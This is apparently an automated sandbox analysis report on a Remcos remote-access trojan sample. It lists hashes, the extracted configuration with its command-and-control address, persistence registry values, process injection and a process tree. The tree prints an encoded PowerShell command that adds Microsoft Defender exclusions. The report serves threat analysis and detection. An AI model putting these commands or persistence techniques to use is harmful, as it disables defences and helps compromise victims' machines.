Analysis
max time kernel: 93s
max time network: 94s
platform: windows11-21h2_x64
resource: win11-20240412-en
resource tags: arch:x64, arch:x86, image:win11-20240412-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 13-04-2024 04:32
Static task: static1
Behavioral task: behavioral1
  Sample: 19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe
  Resource: win10v2004-20240412-en
Behavioral task: behavioral2
  Sample: 19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe
  Resource: win11-20240412-en
General
Target: 19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe
Size: 203KB
MD5: 869031d5e7abc377ebe084c375ffdf1e
SHA1: 89c16a7d8f1b95c4c0a72d7407f43686c329ec9f
SHA256: 19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7
SHA512: c269ef4bf32fbb350b0c25cc6f6a4e570cb8d1a6d9755636a1d879aa24956ebef6d1b5f5cbdd4e1b95531dd55553e77ff82eff398cc37c676d8d705a7b6d05c4
SSDEEP: 6144:1OSGpTE6C8JaksU4gcet422dSnVE492l9:kSMEfUaMce+22YnV
Malware Config
Extracted family: remcos
Version: 1.7 Pro
Host: 185.241.208.113:2404
audio_folder: audio
audio_path: %AppData%
audio_record_time: 5
connect_delay: 0
connect_interval: 5
copy_file: remcos.exe
copy_folder: remcos
delete_file: true
hide_file: true
hide_keylog_file: true
install_flag: true
install_path: %AppData%
keylog_crypt: true
keylog_file: logs.dat
keylog_flag: false
keylog_folder: remcos
keylog_path: %AppData%
mouse_option: false
mutex: remcos_tifinqdfds
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screens
screenshot_path: %AppData%
screenshot_time: 1
startup_value: remcos
take_screenshot_option: false
take_screenshot_time: 5
Signatures

Modifies WinLogon for persistence (2 TTPs, 2 IoCs)
Processes: Backdoor.exe, remcos.exe
  description | ioc | process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\WINDOWS\\system32\\userinit.exe, \"C:\\Users\\Admin\\AppData\\Roaming\\remcos\\remcos.exe\"" | Backdoor.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\WINDOWS\\system32\\userinit.exe, \"C:\\Users\\Admin\\AppData\\Roaming\\remcos\\remcos.exe\"" | remcos.exe

Executes dropped EXE (2 IoCs)
Processes: Backdoor.exe, remcos.exe
  pid | process
  4148 | Backdoor.exe
  2548 | remcos.exe

YARA rule matches (signature title not captured on the page)
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\Backdoor.exe | upx
  behavioral2/memory/5032-16-0x00000146F9630000-0x00000146F9640000-memory.dmp | upx
  behavioral2/memory/4148-27-0x0000000000400000-0x000000000041F000-memory.dmp | upx
  behavioral2/memory/4148-31-0x0000000000400000-0x000000000041F000-memory.dmp | upx
  behavioral2/memory/2548-39-0x0000000000400000-0x000000000041F000-memory.dmp | upx
  behavioral2/memory/3500-40-0x0000000000400000-0x000000000041F000-memory.dmp | upx
  behavioral2/memory/2548-41-0x0000000000400000-0x000000000041F000-memory.dmp | upx

Adds Run key to start application (2 TTPs, 2 IoCs)
Processes: Backdoor.exe, remcos.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Users\\Admin\\AppData\\Roaming\\remcos\\remcos.exe\"" | Backdoor.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Users\\Admin\\AppData\\Roaming\\remcos\\remcos.exe\"" | remcos.exe

Modifies WinLogon (2 TTPs, 2 IoCs)
Processes: Backdoor.exe, remcos.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\ | Backdoor.exe
  Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\ | remcos.exe

Suspicious use of SetThreadContext (1 IoCs)
Processes: remcos.exe
  description | pid | process | target process
  PID 2548 set thread context of 3500 | 2548 | remcos.exe | iexplore.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Runs ping.exe (1 TTPs, 1 IoCs)

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes: powershell.exe
  pid | process
  5032 | powershell.exe
  5032 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes: powershell.exe
  description | pid | process
  Token: SeDebugPrivilege | 5032 | powershell.exe

Suspicious use of WriteProcessMemory (22 IoCs)
Processes: 19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe, Backdoor.exe, cmd.exe, remcos.exe
  description | pid | process | target process
  PID 3676 wrote to memory of 5032 | 3676 | 19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe | powershell.exe (2 entries)
  PID 3676 wrote to memory of 4148 | 3676 | 19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe | Backdoor.exe (3 entries)
  PID 4148 wrote to memory of 4928 | 4148 | Backdoor.exe | cmd.exe (3 entries)
  PID 4928 wrote to memory of 5016 | 4928 | cmd.exe | PING.EXE (3 entries)
  PID 4928 wrote to memory of 2548 | 4928 | cmd.exe | remcos.exe (3 entries)
  PID 2548 wrote to memory of 3500 | 2548 | remcos.exe | iexplore.exe (8 entries)
Processes (process tree; the number is the depth in the tree)

1. C:\Users\Admin\AppData\Local\Temp\19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe
   command line: "C:\Users\Admin\AppData\Local\Temp\19bdd11ed161fdce1a8e1dbbf3edfe4fb5273072101e711ee371bc0420afd7e7.exe"
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAYgB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdwBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAbABpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AdAB6ACMAPgA="
      (the -EncodedCommand argument is UTF-16LE base64; with its inline <# ... #> comment blocks removed it reads: Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, i.e. it adds Microsoft Defender exclusions for the user profile and the system drive)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

   2. C:\Users\Admin\AppData\Local\Temp\Backdoor.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\Backdoor.exe"
      - Modifies WinLogon for persistence
      - Executes dropped EXE
      - Adds Run key to start application
      - Modifies WinLogon
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\SysWOW64\cmd.exe
         command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\SysWOW64\PING.EXE
            command line: PING 127.0.0.1 -n 2
            - Runs ping.exe

         4. C:\Users\Admin\AppData\Roaming\remcos\remcos.exe
            command line: "C:\Users\Admin\AppData\Roaming\remcos\remcos.exe"
            - Modifies WinLogon for persistence
            - Executes dropped EXE
            - Adds Run key to start application
            - Modifies WinLogon
            - Suspicious use of SetThreadContext
            - Suspicious use of WriteProcessMemory

            5. C:\Program Files (x86)\Internet Explorer\iexplore.exe
               command line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Local\Temp\Backdoor.exe
  Filesize: 36KB
  MD5: 55d84d2a0ade5786849beb49da4d2186
  SHA1: c52d358c5deaa50da7cceae0a2e680c0a7b28a08
  SHA256: 1170619b287ca504e5caecf5edb3686df68d1033f34603d6aa8af3b0ab4930c4
  SHA512: 8397221ec3bcfa268e7936681e1f1fb4579f5773e01bd18f12fd9d087fee900a23eeb438f9137efa14d100e85309a9065cf0c8b34e32a3a756957e0b650f3955

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_11wtmtnn.bqi.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\install.bat
  Filesize: 153B
  MD5: 1225a650f89a3b93f79854658d1fed4c
  SHA1: 84c0280016ea03b48c41bf419a71e5ffb79fd06d
  SHA256: f5c88eb67d8a378cae42c15984191ac2228aae24dda4379c03603ea6e5e56494
  SHA512: 96567875f2c1573d08441511339063fb6c7d961e3e1bff4a7cf52c1576db93ba33cc36bf7e714d0332bc4da8a00fcad3f626c0f6f6b93a8dd1bcb01449483635

Memory dumps (name: size)
  memory/2548-41-0x0000000000400000-0x000000000041F000-memory.dmp: 124KB
  memory/2548-39-0x0000000000400000-0x000000000041F000-memory.dmp: 124KB
  memory/3500-40-0x0000000000400000-0x000000000041F000-memory.dmp: 124KB
  memory/3676-1-0x00007FFA711B0000-0x00007FFA71C72000-memory.dmp: 10.8MB
  memory/3676-2-0x0000000000A10000-0x0000000000A20000-memory.dmp: 64KB
  memory/3676-0-0x0000000000190000-0x00000000001CA000-memory.dmp: 232KB
  memory/3676-35-0x00007FFA711B0000-0x00007FFA71C72000-memory.dmp: 10.8MB
  memory/4148-27-0x0000000000400000-0x000000000041F000-memory.dmp: 124KB
  memory/4148-31-0x0000000000400000-0x000000000041F000-memory.dmp: 124KB
  memory/5032-12-0x00007FFA711B0000-0x00007FFA71C72000-memory.dmp: 10.8MB
  memory/5032-33-0x00007FFA711B0000-0x00007FFA71C72000-memory.dmp: 10.8MB
  memory/5032-29-0x00000146F9630000-0x00000146F9640000-memory.dmp: 64KB
  memory/5032-26-0x00000146F9630000-0x00000146F9640000-memory.dmp: 64KB
  memory/5032-25-0x00000146F95A0000-0x00000146F95C2000-memory.dmp: 136KB
  memory/5032-16-0x00000146F9630000-0x00000146F9640000-memory.dmp: 64KB